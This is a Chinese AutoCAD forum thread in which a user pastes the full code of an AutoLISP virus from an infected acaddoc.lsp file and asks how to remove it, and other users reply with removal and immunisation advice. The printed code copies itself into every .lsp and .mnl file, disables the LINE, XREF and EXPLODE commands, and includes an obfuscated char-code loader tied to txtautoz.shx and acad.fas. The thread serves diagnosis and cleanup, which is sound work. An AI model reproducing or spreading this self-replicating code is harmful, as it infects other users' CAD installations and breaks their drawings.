对病毒有研究的来看一下啊，无穷无尽的杀不死啊

革天明

目前整个网络内都是这样的病毒，看了一下代码，能看懂，但没发现有什么破坏作用，只是不停地繁衍后代，杀不死，请教高手看一下。整个acaddoc.lsp的内容如下，第一行是空行。现在能看懂代码在做什么，因为acaddoc的优先级比用户的VLX优先，不知道如何查杀及免疫？



(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
   (setq flag nil)
   (setq flag1 t)
   (if (findfile target)
     (progn
       (setq wjm1 (open target "r"))
       (while (setq text (read-line wjm1))
        (if (= text bz) (setq flag1 nil))
        );while
       (close wjm1)
       );progn
     );if
   (if flag1
     (progn
       (setq wjm (open source "r"))
       (setq wjm1 (open target "a"))
       (write-line (chr 13) wjm1)
       (while (setq text (read-line wjm))
        (if (= text bz) (setq flag t))
        (if flag
          (progn
            (write-line text wjm1)
            );progn
          );if
        );while
       (close wjm1)
       (close wjm)
       );progn
     );if
   );defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
   (progn
     (setq acaddocpath (vl-filename-directory dwgpath))
     (setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
     (setq mnln 0)
     (while (< mnln mnlnum)
       (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
       (app mnlfilename acaddocfile bz)
       (app acaddocfile mnlfilename bz)
       (setq mnln (1+ mnln))
       );while
     (setq lspn 0)
     (while (< lspn lspnum)
       (setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
       (app lspfilename acaddocfile bz)
       (app acaddocfile lspfilename bz)
       (setq lspn (1+ lspn))
       );while
     );progn
   );if
(setq mnln 0)
(while (< mnln mnlnum)
   (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
   (setq mnln1 0)
   (while (< mnln1 mnlnum)
     (setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
     (app mnlfilename mnlfilename1 bz)
     (setq mnln1 (1+ mnln1))
     );while
   (setq lspn1 0)
   (while (< lspn1 lspnum)
     (setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
     (app mnlfilename lspfilename1 bz)
     (setq lspn1 (1+ lspn1))
     );while
   (setq mnln (1+ mnln))
   );while
(setq lspn 0)
(while (< lspn lspnum)
   (setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
   (setq lspn1 0)
   (while (< lspn1 lspnum)
     (setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
     (app lspfilename lspfilename1 bz)
     (setq lspn1 (1+ lspn1))
     );while
   (setq mnln1 0)
   (while (< mnln1 mnlnum)
     (setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
     (app lspfilename mnlfilename1 bz)
     (setq mnln1 (1+ mnln1))
     );while
   (setq lspn (1+ lspn))
   );while
(setvar "sdi" 1)
(setvar "ACADLSPASDOC" 1)
(command "undefine" "line")
(command "undefine" "_line")
(command "undefine" "xref")
(command "undefine" "_xref")
(command "undefine" "explode")
(command "undefine" "_explode")
(setvar "cmdecho" 1)
(princ)
(load "acadapq")
(princ)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
   (setq flag nil)
   (setq flag1 t)
   (if (findfile target)
     (progn
       (setq wjm1 (open target "r"))
       (while (setq text (read-line wjm1))
        (if (= text bz) (setq flag1 nil))
        );while
       (close wjm1)
       );progn
     );if
   (if flag1
     (progn
       (setq wjm (open source "r"))
       (setq wjm1 (open target "a"))
       (write-line (chr 13) wjm1)
       (while (setq text (read-line wjm))
        (if (= text bz) (setq flag t))
        (if flag
          (progn
            (write-line text wjm1)
            );progn
          );if
        );while
       (close wjm1)
       (close wjm)
       );progn
     );if
   );defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))

wowan1314

用SHLISP的CAD病毒专杀也不可以吗？

ll_j

这是两段“病毒”，因为是明码，所以还不能算病毒，只能是恶意代码，但因为人人能改所以危害更深。
这两段病毒涉及到的文件有“acad.lsp acaddoc.lsp acadapq.lsp acad.fas acad.mnl txtautoz.shx”等等，其中txtautoz.shx和是隐藏的病毒源，其它都是被程序调用的病毒代码，除acad.mn（实际上是lisp文件）l以外，都可以删除，acad.mnl需要打开自行删除上面代码，如果有自己的acad.lsp，则也要打开检查。
没有仔细研究这些代码，所以不好细说，以前还有过代码涉及文件“acadapp.lsp acadappq.lsp等 acad.vlx logo.gif”等等，这些文件也是同样处理，注意，logo.gif是一个图标常用的图片，不可随意删除，检查时，采用“缩略图”查看方式就一目了然了。
还有，以前也遇到过代码复制到你打开的任意Lisp文件中的情况，这样，就需要检查电脑中的每一个Lisp文件和mnl文件，太多了？是的，那么，搜索时，就要注意时间节点了，同时，搜索时，也不要忘记隐藏的系统文件夹。
另外，这样“杀”过毒后，把大多数的Lisp文件和mnl文件加一个“只读”属性。

陨落

360的cad专杀就能行，这个我也遇到过

kwok

整个网络就不好搞了,如果是每台电脑都有就麻烦了,要一台台清了,
把电脑内搜出此文件,一般有acaddoc.lsp可能还会带一个acad.fas的,搜完都删掉,再杀一下毒.
.此文一般跟dwg文件在同一目录下.
最好平时注意复制别人的图时要看看目录下有没有此文件,有就要删掉,不然就中招.
.

胆小鬼39

遇到过被360搞了

ZZXXQQ

这个几年前见过。比较难的是这病毒在所有的正常LISP程序后尾部都加了自己的代码。
手工删除就要将所有LISP程序打开，找(setq flagx t)，将其后的代码删除。并将ACAD.MNL尾部的引导部分删了，注意病毒比较狡猾，用了一页的空白将代码放在最后。
然后要按ll_j的说明，将扩展名为lsp的文件和acad.mnl文件全都改成只读，以进行免疫。

革天明

ZZXXQQ 发表于 2012-12-3 21:21
这个几年前见过。比较难的是这病毒在所有的正常LISP程序后尾部都加了自己的代码。
手工删除就要将所有LISP ...

光是手工删除本地电脑都比较麻烦，360的CAD专杀实际比较笨，把所有的都删除了，最后搞的CAD都不能正确运行，现在整个局域网都有了，所以杀不胜杀，
幸亏现在电脑配置都还不错，因为这段代码只浪费不到1s时间，所以打算任它猖狂了
局域网用户电脑水平参差不齐，所以没有进攻能力的时候还是不理它了

革天明

今天使用筑原CAD病毒杀了，能杀掉，目前最新版本3.3

USER2128

革天明 发表于 2012-12-4 12:58
今天使用筑原CAD病毒杀了，能杀掉，目前最新版本3.3

谢谢您好提供“筑原CAD病毒专杀”。想当初不知花了我多少精力的。这样就有备无患了。